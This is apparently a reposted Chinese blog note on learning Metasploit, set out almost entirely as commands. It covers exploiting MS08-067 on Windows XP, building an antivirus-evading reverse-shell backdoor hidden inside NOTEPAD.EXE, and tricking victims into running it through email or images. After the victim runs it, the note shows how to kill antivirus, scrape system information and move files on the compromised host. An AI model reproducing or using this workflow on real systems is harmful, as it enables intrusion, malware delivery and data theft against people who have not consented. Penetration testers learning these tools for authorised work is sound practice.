Metasploit学习

阶段一:初步渗透

 GO!

msfconsole

 相关漏洞

msf > search platform: windows xp sp3

 查看某个漏洞后,查看漏洞详细信息

msf > info exploit/windows/smb/ms08_067_netapi

 选中漏洞

msf > use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.0.108  (设置目标主机IP地址)
> exploit
如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。

阶段二:后渗透(后门控制)

 在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙,使用加密试图躲过杀毒软件。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe
如果不能运行换用其他加密方式。

 查看帮助

man msfvenom

 启动msfconsole并

use exploit/multi/handler

set LHOST 192.168.0.112
set LPORT 4445
set payload windows/meterpreter/reverse_tcp
show options
exploit
等待受害者启动后门程序

  

阶段一补充

 显示内建的文档

msf > help
msf > help search

 查看可以利用的模块

msf > show
msf > show auxiliary
msf > show exploits
msf > show payloads
msf > show encoders
msf > show nops

 搜索可以利用的漏洞

msf > search type:exploit
msf > search CVE-xxxx-xxx
msf > search cve:2014
msf > search name:wordpress
msf > search name:mysql
msf > search path:scada
msf > search platform:aix
msf > search type:post
msf > search windows type:exploit

 使用一个漏洞

msf > use exploit/path/to/exploit_name

 设置payload

msf > show payloads
msf > set payload path/to/payload

 入侵

msf > exploit

  

阶段二补充

 运行靶机shell

meterpreter > shell

 从目标主机shell退出到 meterpreter

exit

 从 meterpreter 退出到MSF框架

background

 查看获得的shell

sessions -l

 切换到id为1的shell

session  -i  1

 拿到shell后第一时间关掉目标杀毒软件

run killav

 查看目标主机信息

sysinfo

 将目标机器上的常见信息收集起来然后下载保存在本地

run scraper

 访问文件系统

cd:切换目标目录;
cat:读取文件内容;
rm:删除文件;
edit:使用vim编辑文件
ls:获取当前目录下的文件;
mkdir:新建目录;
rmdir:删除目录;

 上传/下载文件

upload/download  file

https://blog.csdn.net/qq_36119192/article/details/83215257#%E5%90%8E%E6%B8%97%E9%80%8F%E6%88%AA%E6%96%AD%C2%A0

原文地址:https://www.cnblogs.com/p0pl4r/p/10545109.html